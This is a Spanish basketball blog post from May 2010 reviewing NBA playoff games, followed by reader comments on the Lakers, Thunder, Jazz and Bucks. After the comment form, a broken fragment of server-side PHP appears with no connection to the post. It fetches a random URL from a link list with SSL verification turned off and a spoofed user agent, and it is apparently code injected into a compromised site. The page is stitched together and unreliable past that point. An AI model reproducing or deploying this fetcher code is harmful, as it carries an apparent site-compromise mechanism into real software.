Playoffs 30/04/2010: Pau cerrando

01 de May de 2010 por TheDeerHunter

Un pequeño milagro en forma de balón escupido del aro tras tiro forzado de Kobe. Cae en manos de Gasol, bien colocado y lo deja dentro a 0.5 segundos del final para que los Lakers ganen de un punto eliminando por fin a los incomodísimos Thunder. Lo increíble no era que capturaba un rebote tan decisivo, pues se hizo con 18, 5 de ellos en ataque. Era que tuvo la fortuna de resolver habiendo lanzado apenas 3 veces en toda la segunda mitad. La anterior ocasión, apenas unos segundos antes, la había fallado estrepitosamente a punto de condenar a su equipo. La suerte también juega y a menudo lo hace a favor de los que más la buscan. Y Pau siempre la ha buscado.

Los Lakers disputaron un partido tremendamente serio, muy centrado. Fue el mejor partido de la segunda unidad desde hace muchísimo tiempo, coronado por las genialidades de Kobe y por una defensa inmensa. La actitud y solidaridad en el juego tiene poco que ver con lo mostrado en la regular, como tampoco en otras eliminatorias de primeras fases que se recuerdan. Sin negar que hacen todavía falta ajustes, el esfuerzo ha sido máximo porque el rival lo requería.

Los Thunder funcionaron a base de arreones de Durant y Westbrook, malviviendo a base de cantidades ingentes de tiros libres y del buen número de pérdidas que provocaron a los campeones. También gozaron de la ayuda de Green, Krstic e Ibaka que firmaron muy buenos minutos. Sólo les faltó un mínimo de suerte que no tuvieron y no tener en frente un rival tan duro como Los Angeles Lakers.

El rival será, como se esperaba, los Utah Jazz, pero con bastantes más sudores de los previstos. Sin Nenê los Nuggets llegaban a Salt Lake como ovejas al matadero. Sin embargo tocaba lección de basket por parte del maestro Billups, con aliado inesperado en la figura de Joey Graham. Con estos dos bastante dispuestos a amargar todas las fiestas locales, los Jazz le vieron las orejas al lobo durante bastante tiempo. Quizás si Melo hubiera estado más acertado estaríamos hablando de otra cosa. Los que sí lo estuvieron fueron Boozer, Millsap y Westley Matthews, con Deron intermitente con problemas de faltas.

Por último decepción en el Bradley Center de Milwaukee. Los Bucks dieron un espectáculo lamentable terminando con unos pobres 69 puntos y porcentajes de tiro ridículos. Por su parte sólo se salvó Delfino de la quema, insuficiente como para evitar que los Hawks vuelvan vivitos y coleando a Atlanta, a recibirles como se merecen. Pero claro, los Bucks ya han demostrado que pueden ganar allí.

PREMIOS

MVP: Monstruoso el nivel que está demostrando Carlos Boozer en estos playoffs y eso que teóricamente está tocado. 22 puntos y 20 rebotes para el de Duke. Kobe Bryant (32 puntos y 7 rebotes) apareció cuando más se le necesitaba aunque fue Pau Gasol el que anotó la canasta definitiva. Antes había anotado 9 puntos y había cogido 18 rebotes.

Rookie: Wesley Matthews se está confirmando como uno de los rookies más sorprendentes del año. En un partido de Playoffs importantísimo anotó 23 puntos cruciales. Y Serge Ibaka sigue respondiendo a la confianza de Scott Brooks. Anoche con 10 puntos y 8 rebotes y una buena defensa sobre Gasol.

Sorpresa: Ayer, Joey Graham se disfrazó de Carmelo Anthony anotando 21 puntos y recogiendo 10 rebotes. Desgraciadamente no fue suficiente.

Decepción: En la NBA anotar menos de 69 puntos es motivo de escarnio público y hacerlo en el partido de Playoffs que te puede dar el pase a la siguiente ronda es sinónimo de “se hicieron caquita encima”. De todas maneras, los Bucks han demostrado que pueden dar mucho más de sí.

Esfuerzo en vano: Westbrook y Billups fueron los jugadores más destacados en las eliminaciones de Thunder y Nuggets, respectivamente. 21 puntos, 9 asistencias para el primero  30 puntos, 8 asistencias para el segundo. 12 años les separan.

Y MAÑANA…

Hasta ahora hemos disfrutado de los Playoffs pero ahora sí que encima lo realmente interesante. Primer partido de la serie Cavaliers – Celtics, una serie que sin duda va a estar marcada por la intensidad y posiblemente por el codo de Lebron James, que parece que le da algún problema. De todas maneras todo estamos seguros de que a la hora de la verdad “King” James está en plena forma.

Comenta

17 comentarios a esta entrada

  1. Toni dice:
    #1

    Cuando pau falló el gancho a falta de 40segundos para acabar el partido me frustré hasta yo aunque confiaba que Kobe la enchufaría, falla, pero Gasol se libra de Ibaka y finiquita la eliminatoria para sorpresa de todos tras ver que en toda la segunda parte había mirado al aro 3 veces… Lo que es el basquet.
    Por cierto, Adam Morrison parece algo raro, hubo un segundo que lo enfocaron de refilon y iba con el chandal
    morado y el bigotillo ese… Qué personaje.

    Por cierto, confirmado el secreto a voces, Lebron mvp.

      Citar

  2. Toni dice:
    #2

    aaaa, Lemontus, ¿reconoceras almenos que tus Bucks lo tienen muy cuesta arriba no? Ojalá y me equivoque porque me producen mas simpatía que los Hawks (no por nada en especial)mas que nada porque tengo esperanzas en Jennings y el ausente Bogut, no se si segundo mejor pivot de la nba pero top5 seguro.

    Este blog no para de evolucionar, el año pasado a estas alturas era puntual el dia que habia 15 comentarios y ahora se superan los 20 diarios con suma facilidad.
    Sois unos cracks.

      Citar

  3. Love Denise dice:
    #3

    Para mí, los Lakers, con la calidad del quinteto que tienen, juegan rematadamente mal, en el 5º partido se vió que la forma de despegarse de los Thunder era enviando balones interiores a Bynum y Pau; y ayer…, éstos dos estaban en ataque como dos simples tarugos de 2’15 que se limitan a bloquear. Tan dificil es meter balones dentro, sobre todo a Pau, defendido por Green al cual le saca más de media cabeza?
    Se han salvado una vez más gracias a las individualidades de Kobe y el último balón de Pau, pero colectivamente, es un equipo que hace un juego lento, feisimo y poco vistoso para el nivel de los jugadores que tienen.
    A este nivel, pienso que no se puede ganar la NBA, si quieren hacrlo, deben mejorar muchísimo.

      Citar

  4. Love Denise dice:
    #4

    desde mi humilde opinión, Demasiado están haciendo los Bucks, que han tenido los eggs de llevar la serie a 7 partidos con un equipo bastante inferior al de los Halcones. No creo que haya que reprocharle nada a los ciervos.
    Otra sorpresa es la eliminación de los Nuggets, que siempre acaban decepcionando en playoffs.

      Citar

  5. TheDeerHunter dice:
    #5

    LDenise, no te entiendo.
    Anoche los Lakers hicieron un partidazo en toda regla. Como mucho te matizaría algún error puntual que es cierto que todavía queda por corregir.
    De hecho te iba a comentar qué te pareción el banco en general y Walton en particular.

    Las cosas con respecto a los dos interiores no siempre son ‘a’+’b’. Buena parte de culpa la tuvieron ellos mismos (incluido Pau) que en muchas ocasiones o no encuentran la posición con facilidad o la sueltan demasiado pronto… y después están las circunstancias del partido. Si Kobe está como estaba en el tercer cuarto hay que dársela a él… que para eso es el mejor y le pagan el pastizal que cobra.
    Por cierto, no lo he dicho en la crónica, Pau estuvo correcto en la mayoría de los aspectos… pero anoche el equipo sí le pedía un poco más de protagonismo y el no supo leerlo (ni ejecutarlo) No siempre los temas alrededor de Pau son culpa de lo que hay alrededor de Pau. En ataque estuvo francamente mal, perdiendo balones y fallando canastas incomprensibles.

    Si algo falló ayer es:
    1) porque el rival también juega y los Thunder lo han hecho muy bien más allá de su currículum
    2) porque el tema de las faltitas ha clamado al cielo esta eliminatoria. Para mí queda completamente demostrado que en Oklahoma los contactos no eran considerados igual en una y otra zona.

    Los Lakers hicieron un partidazo al nivel del 6º del año pasado en Denver o el anterior en San Antonio. Nada que ver con las dos primeras rondas de ninguno de los dos años. Y tampoco nada que ver con el final de la regular, por supuesto.

      Citar

  6. Love Denise dice:
    #6

    Bueno, defensivamente estuvo correcto, ofensivamente pienso que dejan bastante que desear.
    sobre el banco: Odom bien, Walton? jugó poco, se tiró 2 “pedrolos” que le entraron de casualidad; Brown: bien el tiro, aportando puntos, pero perdió balones cruciales que le propiciaron como puntos faciles en contrataque a los Thunder, y Farmar estuvo normalito. Obviamente, el banco aportó más que en otras ocasiones, pero tampoco como para tirar cohetes
    Es cierto que el rival juega, pero no me parece esperanzador para Lakers el ganar en el último segundo ante un equipo inferior y en el que su principal estrella estuvo horrible de cara al aro. Ya sé que los thunder son rapidos, pero..alguién vió algun contraataque de Lakers? o algún balon colgado a Bynum ? su juego es lento y muy previsible. Me parece fenomenal la defensa de Ron sobre Durant, pero en ataque también tiene que enchufar alguna, porque entonces la defensa se cierra sobre Kobe, aún así ayer metió un par de canastas dificiles en momentos delicado, pero en el ultimo mes…
    Desde mi punto de vista, no me pareció un partidazo de Lakers, de hecho si Pau no anota el ultimo tiro, estariamos hablando de otra debacle más. De los 4 partidos perdidos, los Thunder han podido ganar perfectamente 3 con un poco más de suerte y experiencia. Mucho tienen que mejorar estos Lakers…

      Citar

  7. PIRATA dice:
    #7

    Pues yo estoy contigo Deer, creo que LAL hizo un partido super serio, no siempre te puede salir todo, Pau llevaba porcentajes por encima del 53%. Y una cosa esta clara sin el tema de las faltas (escandaloso) LAL hubiera cerrado el partido en el trecer cuarto.
    Una pregunta, viendo ayer la actuación de Westbrook y sus numeros en partidos anteriores no creeis que el jugon de verdad en Thunder en esta seria ha sido el ?
    Otra, va aguantar Kobe todo lo que quedo de PO? Lo vi muy cascado…..

      Citar

  8. Viva_Dirk dice:
    #8

    Partido para la esperanza por como de bien se vio a Kobe, con el físicamente a tope tenemos mucho ganado. Artest sigue siendo un quebradero de cabeza en ataque, a falta de 01:20 para el final tiene un triple absolutamente solo para poner 2 arriba a los Lakers y lo falla por mucho, cosas como esa las vamos a necesitar mas adelante.

    A los Thunders hay poco que decirles, si en el mercado de agentes libres se hacen con un PF All-Star serán autenticos cocos siempre que mantengan esta actitud.

      Citar

  9. Love Denise dice:
    #9

    desde mi punto de vista, una cosa es hacer un partido serio (que si no lo hacen apaga y vamonos), y otro hacer un buen partido. lakers perjudicado por los arbitros?? yo no lo ví así,

      Citar

  10. Love Denise dice:
    #10

    un jugador tipo Amare Stoudemire le vendría fenomenal a estos Thunder

      Citar

  11. the choosen one dice:
    #11

    amare le cortaria a jeff green la progresion

    les haria falta un pivot muy muy bueno defendiendo

    puntos tienen de sobra

      Citar

  12. Viva_Dirk dice:
    #12

    Jeff Green no es un ala-pivot para un equipo puntero, como primer reserva sería perfecto. Yo antes que en Amare pensaba en Bosh o Boozer. También sería importante que Harden le robe cada vez mas minutos al suizo.

      Citar

  13. Txusma dice:
    #13

    ¿Cómo ha defendido Harden a Kobe cuando han coincidido? En un equipo con Durant y Westbrook no hace falta más tralla anotadora sinó un gran defensa en la posición de escolta para defender a los pesos pesados rivales que exhima de esa posibilidad al mismo Durant. En todo caso estoy de acuerdo en que Harden debería ser titular y Sefolosha ser utilizados en los casos puntuales en que fuera necesario.
    Y tb estoy con q Green puede ser un gran sexto hombre. Es má bien un 3.5 que puede hacer daño dsd ambas posiciones.

      Citar

  14. sergio dice:
    #14

    Pues los Thunder pueden ser los grandes tapados a la hora de repartirse los jugadores que terminan contrato esta temporada. El año que viene liberan sus tres grandes contratos: Earl Watson, Etan Thomas y Matt Harpring. Aparte, lo que podemos definir como “morralla”: Kevin Ollie, Livingston, Ryan Bowen, Mike Wilks y unos tales Mustafa Shakur y Antonio Anderson. Entre todos ellos suman alrededor de 3000 minutos de los 19000 posibles.

    Se les queda una plantillacon Collison, Harden, Durant, Ibaka, Westbrook, Green, Sefolosha, Eric Maynor, Mullens, White y Weaver por 40 millones de $. Creo que es un equipo muy atractivo…

      Citar

  15. sergio dice:
    #15

    Buen artículo en El Mundo haciendo justicia a uno de mis jugadores favoritos de siempre… y sobre el cual estuvimos hablando hace poco no demasiado bien

    http://www.elmundo.es/blogs/deportes/alrebote/2010/05/01/hill-justicia-poetica.html

      Citar

  16. sergio dice:
    #16

    Ah! y ya estais en el puesto 7º cuando se busca “blog nba” en el google. Y en cualquier idioma, no solo en español. Enhorabuena chicos por el trabajo hecho. Cada día mejoráis más. Aquí hasta LEmontus se ha vuelto pacífico…

      Citar

  17. LEmontus dice:
    #17

    hombre está claro que Hawks lo tiene todo de cara… pero el ciervo no está muerto … Mal partido de jennings y Salmons y eso se traduce en derrota. Delfino es increible aposté por él hace tiempo para jugador revelación de la próxima temporada.Del partido un mal tercer cuarto que nos condenó y aun así jennings al final se puso serio pero muy tarde…. FEAR THE DEER.

    Viva Dirk lleva totda la razón Green no es ni de coña un ala pivot para ganar un anillo, es más para mi e sun jugador algo sobrevalorado no sé porque es una opción en ataque en ese equipo.

    Por último concluyo con que bueno es PAU GASOL,, y que pena que lal no juegue entorno a él.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>